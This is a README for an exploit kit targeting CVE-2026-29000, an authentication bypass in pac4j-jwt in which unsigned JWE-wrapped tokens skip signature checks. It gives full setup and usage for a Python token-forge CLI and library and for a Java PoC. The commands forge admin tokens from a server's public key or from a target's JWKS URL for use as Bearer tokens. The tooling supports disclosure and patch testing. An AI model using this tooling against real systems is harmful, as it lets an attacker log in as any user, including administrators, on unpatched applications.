Share
## https://sploitus.com/exploit?id=896BC665-9FC0-5CF1-B84E-9AE8E2571541
# CVE-2026-29000: pac4j-jwt JwtAuthenticator authentication bypass

Full buildout: writeup, Java in-process PoC, Python token-forge CLI and library, tests.

## Summary

- **CVE:** CVE-2026-29000 (CVSS 10, CWE-347)
- **Affected:** pac4j-jwt < 4.5.9 / < 5.7.9 / < 6.3.3 when using JWE + signature config
- **Issue:** JWE-wrapped **PlainJWT** (unsigned) bypasses signature verification; attacker with only the server RSA **public** key can forge tokens and authenticate as any user.

See [WRITEUP.md](WRITEUP.md) for details and PoC requirements.

## Layout

| Path | Description |
|------|-------------|
| `WRITEUP.md` | CVE summary, root cause, affected versions, PoC requirements, references |
| `poc/` | Java Maven PoC (in-process bypass against pac4j-jwt 6.0.3) |
| `token_forge/` | Python package: forge JWE-wrapped PlainJWT from PEM or JWKS URL |
| `tests/` | Pytest tests for claims, forge, keys, CLI |
| `requirements.txt` | Python deps (jwcrypto, requests, pytest) |

## Python (token forge)

### Setup

```bash
python3 -m venv .venv
source .venv/bin/activate   # or .venv\Scripts\activate on Windows
pip install -r requirements.txt
```

### Run CLI

```bash
# From PEM (generate with: openssl genrsa 2048 | openssl rsa -pubout)
python -m token_forge --public-key /path/to/pub.pem --subject admin --roles "ROLE_ADMIN,ROLE_USER"

# From JWKS URL
python -m token_forge --jwks-url https://target/.well-known/jwks.json --subject admin

# Options: --exp-sec, --jwks-kid, --log-file, --enable-file-logging, --verbose
```

Output: single line (forged JWT); use as `Authorization: Bearer `.

### Library

```python
from token_forge import forge_token, load_public_key_from_pem, load_public_key_from_jwks_url

with open("pub.pem", "rb") as f:
    key = load_public_key_from_pem(f.read())
token = forge_token(key, subject="admin", roles=["ROLE_ADMIN"], exp_sec=3600)
```

### Tests

```bash
pytest -vv --tb=short --maxfail=1
# or with warnings as errors:
pytest -vv -W error -W always --tb=short --maxfail=1
```

## Java PoC

### Build and run (requires Java 11+ and Maven)

```bash
cd poc
mvn -q compile exec:java -Dexec.mainClass="Poc"
# Or token-only (no in-process validation):
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--token-only"
# With custom subject/roles:
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--subject user --roles ROLE_A,ROLE_B"
```

Expected: `[BYPASS] Authenticated as: admin#override` and roles when running in-process.

## References

- [CodeAnt AI โ€“ Full PoC and analysis](https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key)
- [pac4j security advisory](https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html)
- [OpenCVE CVE-2026-29000](https://app.opencve.io/cve/CVE-2026-29000)